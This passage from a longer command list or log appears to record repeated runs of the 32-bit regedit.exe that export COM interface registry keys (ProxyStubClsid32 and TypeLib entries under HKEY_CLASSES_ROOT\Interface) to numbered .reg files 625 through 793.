/e "625.reg" "HKEY_CLASSES_ROOT\Interface\{0002E118-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "626.reg" "HKEY_CLASSES_ROOT\Interface\{0002E116-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "627.reg" "HKEY_CLASSES_ROOT\Interface\{0002E130-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "628.reg" "HKEY_CLASSES_ROOT\Interface\{0002E159-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "629.reg" "HKEY_CLASSES_ROOT\Interface\{0002E158-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "630.reg" "HKEY_CLASSES_ROOT\Interface\{0002E131-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "631.reg" "HKEY_CLASSES_ROOT\Interface\{000C0358-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "632.reg" "HKEY_CLASSES_ROOT\Interface\{000C0357-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "633.reg" "HKEY_CLASSES_ROOT\Interface\{000C0356-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "634.reg" "HKEY_CLASSES_ROOT\Interface\{000C0359-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "635.reg" "HKEY_CLASSES_ROOT\Interface\{000C0361-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "636.reg" "HKEY_CLASSES_ROOT\Interface\{000C0360-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "637.reg" "HKEY_CLASSES_ROOT\Interface\{000C035A-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "638.reg" "HKEY_CLASSES_ROOT\Interface\{000C0341-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "639.reg" "HKEY_CLASSES_ROOT\Interface\{000C0340-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "640.reg" "HKEY_CLASSES_ROOT\Interface\{000C033E-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "641.reg" "HKEY_CLASSES_ROOT\Interface\{000C0351-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "642.reg" "HKEY_CLASSES_ROOT\Interface\{000C0354-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "643.reg" "HKEY_CLASSES_ROOT\Interface\{000C0353-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "644.reg" "HKEY_CLASSES_ROOT\Interface\{000C0352-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "645.reg" "HKEY_CLASSES_ROOT\Interface\{000C036C-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "646.reg" "HKEY_CLASSES_ROOT\Interface\{000C036A-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "647.reg" "HKEY_CLASSES_ROOT\Interface\{000C0369-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "648.reg" "HKEY_CLASSES_ROOT\Interface\{000C036D-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "649.reg" "HKEY_CLASSES_ROOT\Interface\{000C0370-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "650.reg" "HKEY_CLASSES_ROOT\Interface\{000C036F-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "651.reg" "HKEY_CLASSES_ROOT\Interface\{000C036E-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "652.reg" "HKEY_CLASSES_ROOT\Interface\{000C0364-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "653.reg" "HKEY_CLASSES_ROOT\Interface\{000C0363-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "654.reg" "HKEY_CLASSES_ROOT\Interface\{000C0362-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "655.reg" "HKEY_CLASSES_ROOT\Interface\{000C0365-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "656.reg" "HKEY_CLASSES_ROOT\Interface\{000C0368-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "657.reg" "HKEY_CLASSES_ROOT\Interface\{000C0367-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "658.reg" "HKEY_CLASSES_ROOT\Interface\{000C0366-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "659.reg" "HKEY_CLASSES_ROOT\Interface\{000C033D-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "660.reg" "HKEY_CLASSES_ROOT\Interface\{000C031F-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "661.reg" "HKEY_CLASSES_ROOT\Interface\{000C031E-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "662.reg" "HKEY_CLASSES_ROOT\Interface\{000C031D-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "663.reg" "HKEY_CLASSES_ROOT\Interface\{000C0320-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "664.reg" "HKEY_CLASSES_ROOT\Interface\{000C0324-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "665.reg" "HKEY_CLASSES_ROOT\Interface\{000C0322-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "666.reg" "HKEY_CLASSES_ROOT\Interface\{000C0321-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "667.reg" "HKEY_CLASSES_ROOT\Interface\{000C0318-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "668.reg" "HKEY_CLASSES_ROOT\Interface\{000C0317-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "669.reg" "HKEY_CLASSES_ROOT\Interface\{000C0316-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "670.reg" "HKEY_CLASSES_ROOT\Interface\{000C0319-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "671.reg" "HKEY_CLASSES_ROOT\Interface\{000C031C-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "672.reg" "HKEY_CLASSES_ROOT\Interface\{000C031B-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "673.reg" "HKEY_CLASSES_ROOT\Interface\{000C031A-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "674.reg" "HKEY_CLASSES_ROOT\Interface\{000C0338-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "675.reg" "HKEY_CLASSES_ROOT\Interface\{000C0337-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "676.reg" "HKEY_CLASSES_ROOT\Interface\{000C0334-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "677.reg" "HKEY_CLASSES_ROOT\Interface\{000C0339-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "678.reg" "HKEY_CLASSES_ROOT\Interface\{000C033C-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "679.reg" "HKEY_CLASSES_ROOT\Interface\{000C033B-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "680.reg" "HKEY_CLASSES_ROOT\Interface\{000C033A-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "681.reg" "HKEY_CLASSES_ROOT\Interface\{000C032E-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "682.reg" "HKEY_CLASSES_ROOT\Interface\{000C0328-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "683.reg" "HKEY_CLASSES_ROOT\Interface\{000C0326-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "684.reg" "HKEY_CLASSES_ROOT\Interface\{000C0330-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "685.reg" "HKEY_CLASSES_ROOT\Interface\{000C0333-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "686.reg" "HKEY_CLASSES_ROOT\Interface\{000C0332-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "687.reg" "HKEY_CLASSES_ROOT\Interface\{000C0331-0000-0000-C000-000000000046}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "688.reg" "HKEY_CLASSES_ROOT\Interface\{305106D0-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "689.reg" "HKEY_CLASSES_ROOT\Interface\{305106CE-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "690.reg" "HKEY_CLASSES_ROOT\Interface\{305106CC-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "691.reg" "HKEY_CLASSES_ROOT\Interface\{305106D2-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "692.reg" "HKEY_CLASSES_ROOT\Interface\{305106D8-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "693.reg" "HKEY_CLASSES_ROOT\Interface\{305106D6-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "694.reg" "HKEY_CLASSES_ROOT\Interface\{305106D4-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "695.reg" "HKEY_CLASSES_ROOT\Interface\{305106CA-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "696.reg" "HKEY_CLASSES_ROOT\Interface\{305106C2-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "697.reg" "HKEY_CLASSES_ROOT\Interface\{305104C2-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "698.reg" "HKEY_CLASSES_ROOT\Interface\{305104C1-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "699.reg" "HKEY_CLASSES_ROOT\Interface\{305106C4-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "700.reg" "HKEY_CLASSES_ROOT\Interface\{305106C7-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "701.reg" "HKEY_CLASSES_ROOT\Interface\{305106C6-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "702.reg" "HKEY_CLASSES_ROOT\Interface\{305106C5-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "703.reg" "HKEY_CLASSES_ROOT\Interface\{305106DA-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "704.reg" "HKEY_CLASSES_ROOT\Interface\{305106F4-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "705.reg" "HKEY_CLASSES_ROOT\Interface\{305106F3-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "706.reg" "HKEY_CLASSES_ROOT\Interface\{305106EE-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "707.reg" "HKEY_CLASSES_ROOT\Interface\{305106FD-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "708.reg" "HKEY_CLASSES_ROOT\Interface\{30510706-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "709.reg" "HKEY_CLASSES_ROOT\Interface\{30510705-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "710.reg" "HKEY_CLASSES_ROOT\Interface\{30510704-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "711.reg" "HKEY_CLASSES_ROOT\Interface\{305106ED-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "712.reg" "HKEY_CLASSES_ROOT\Interface\{305106E8-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "713.reg" "HKEY_CLASSES_ROOT\Interface\{305106E7-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "714.reg" "HKEY_CLASSES_ROOT\Interface\{305106DE-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "715.reg" "HKEY_CLASSES_ROOT\Interface\{305106E9-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "716.reg" "HKEY_CLASSES_ROOT\Interface\{305106EC-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "717.reg" "HKEY_CLASSES_ROOT\Interface\{305106EB-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "718.reg" "HKEY_CLASSES_ROOT\Interface\{305106EA-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "719.reg" "HKEY_CLASSES_ROOT\Interface\{305104C0-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "720.reg" "HKEY_CLASSES_ROOT\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "721.reg" "HKEY_CLASSES_ROOT\Interface\{2F12C599-7AA5-407A-B898-09E6E4ED2D1E}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "722.reg" "HKEY_CLASSES_ROOT\Interface\{2EC1F844-766A-47A1-91F4-2EEB6190F80C}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "723.reg" "HKEY_CLASSES_ROOT\Interface\{3050F2D2-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "724.reg" "HKEY_CLASSES_ROOT\Interface\{3050F5A3-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "725.reg" "HKEY_CLASSES_ROOT\Interface\{3050F5A2-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "726.reg" "HKEY_CLASSES_ROOT\Interface\{3050F2D3-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "727.reg" "HKEY_CLASSES_ROOT\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "728.reg" "HKEY_CLASSES_ROOT\Interface\{2DDBF3D4-8CB8-43CF-B1CA-834987325EE1}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "729.reg" "HKEY_CLASSES_ROOT\Interface\{2DDBF3D4-8CB8-43CF-B1CA-834987325EE1}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "730.reg" "HKEY_CLASSES_ROOT\Interface\{2DA16203-3F58-404F-839D-E4CDE7DD0DED}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "731.reg" "HKEY_CLASSES_ROOT\Interface\{2DEA7885-1846-411F-A41E-017A8FD778FF}\ProxyStubClsid"
C:\Windows\SysWOW64\regedit.exe
/e "732.reg" "HKEY_CLASSES_ROOT\Interface\{2EB31403-EBE0-41EA-AE91-A1953104EA55}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "733.reg" "HKEY_CLASSES_ROOT\Interface\{2DEA7885-1846-411F-A41E-017A8FD778FF}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "734.reg" "HKEY_CLASSES_ROOT\Interface\{2DEA7885-1846-411F-A41E-017A8FD778FF}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "735.reg" "HKEY_CLASSES_ROOT\Interface\{3050F5A4-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "736.reg" "HKEY_CLASSES_ROOT\Interface\{305104BA-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "737.reg" "HKEY_CLASSES_ROOT\Interface\{305104B9-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "738.reg" "HKEY_CLASSES_ROOT\Interface\{305104B8-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "739.reg" "HKEY_CLASSES_ROOT\Interface\{305104BC-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "740.reg" "HKEY_CLASSES_ROOT\Interface\{305104BF-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "741.reg" "HKEY_CLASSES_ROOT\Interface\{305104BE-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "742.reg" "HKEY_CLASSES_ROOT\Interface\{305104BD-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "743.reg" "HKEY_CLASSES_ROOT\Interface\{305104B7-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "744.reg" "HKEY_CLASSES_ROOT\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\TypeLib"
C:\Windows\SysWOW64\regedit.exe
/e "745.reg" "HKEY_CLASSES_ROOT\Interface\{3050F5A6-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "746.reg" "HKEY_CLASSES_ROOT\Interface\{3050F5A5-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "747.reg" "HKEY_CLASSES_ROOT\Interface\{305104AE-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "748.reg" "HKEY_CLASSES_ROOT\Interface\{305104B6-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "749.reg" "HKEY_CLASSES_ROOT\Interface\{305104B5-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "750.reg" "HKEY_CLASSES_ROOT\Interface\{305104AF-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "751.reg" "HKEY_CLASSES_ROOT\Interface\{30590088-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "752.reg" "HKEY_CLASSES_ROOT\Interface\{30590087-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "753.reg" "HKEY_CLASSES_ROOT\Interface\{30590086-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "754.reg" "HKEY_CLASSES_ROOT\Interface\{30590089-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "755.reg" "HKEY_CLASSES_ROOT\Interface\{30590092-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "756.reg" "HKEY_CLASSES_ROOT\Interface\{3059008B-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "757.reg" "HKEY_CLASSES_ROOT\Interface\{3059008A-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "758.reg" "HKEY_CLASSES_ROOT\Interface\{30590081-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "759.reg" "HKEY_CLASSES_ROOT\Interface\{3059007C-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "760.reg" "HKEY_CLASSES_ROOT\Interface\{30590079-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "761.reg" "HKEY_CLASSES_ROOT\Interface\{30590078-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "762.reg" "HKEY_CLASSES_ROOT\Interface\{3059007D-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "763.reg" "HKEY_CLASSES_ROOT\Interface\{30590080-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "764.reg" "HKEY_CLASSES_ROOT\Interface\{3059007F-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "765.reg" "HKEY_CLASSES_ROOT\Interface\{3059007E-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "766.reg" "HKEY_CLASSES_ROOT\Interface\{30590093-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "767.reg" "HKEY_CLASSES_ROOT\Interface\{305900A7-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "768.reg" "HKEY_CLASSES_ROOT\Interface\{305900A1-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "769.reg" "HKEY_CLASSES_ROOT\Interface\{305900A0-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "770.reg" "HKEY_CLASSES_ROOT\Interface\{305900A8-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "771.reg" "HKEY_CLASSES_ROOT\Interface\{31508CC7-9BC7-494B-9D0F-7B1C7F144182}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "772.reg" "HKEY_CLASSES_ROOT\Interface\{305900BA-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "773.reg" "HKEY_CLASSES_ROOT\Interface\{305900A9-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "774.reg" "HKEY_CLASSES_ROOT\Interface\{3059009F-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "775.reg" "HKEY_CLASSES_ROOT\Interface\{3059009A-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "776.reg" "HKEY_CLASSES_ROOT\Interface\{30590098-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "777.reg" "HKEY_CLASSES_ROOT\Interface\{30590097-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "778.reg" "HKEY_CLASSES_ROOT\Interface\{3059009B-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "779.reg" "HKEY_CLASSES_ROOT\Interface\{3059009E-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "780.reg" "HKEY_CLASSES_ROOT\Interface\{3059009D-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "781.reg" "HKEY_CLASSES_ROOT\Interface\{3059009C-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "782.reg" "HKEY_CLASSES_ROOT\Interface\{30590077-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "783.reg" "HKEY_CLASSES_ROOT\Interface\{30510742-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "784.reg" "HKEY_CLASSES_ROOT\Interface\{30510740-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "785.reg" "HKEY_CLASSES_ROOT\Interface\{3051073C-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "786.reg" "HKEY_CLASSES_ROOT\Interface\{30510744-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "787.reg" "HKEY_CLASSES_ROOT\Interface\{3051074B-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "788.reg" "HKEY_CLASSES_ROOT\Interface\{30510748-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "789.reg" "HKEY_CLASSES_ROOT\Interface\{30510746-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "790.reg" "HKEY_CLASSES_ROOT\Interface\{30510738-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "791.reg" "HKEY_CLASSES_ROOT\Interface\{30510709-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "792.reg" "HKEY_CLASSES_ROOT\Interface\{30510708-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
/e "793.reg" "HKEY_CLASSES_ROOT\Interface\{30510707-98B5-11CF-BB82-00AA00BDCE0B}\ProxyStubClsid32"
C:\Windows\SysWOW64\regedit.exe
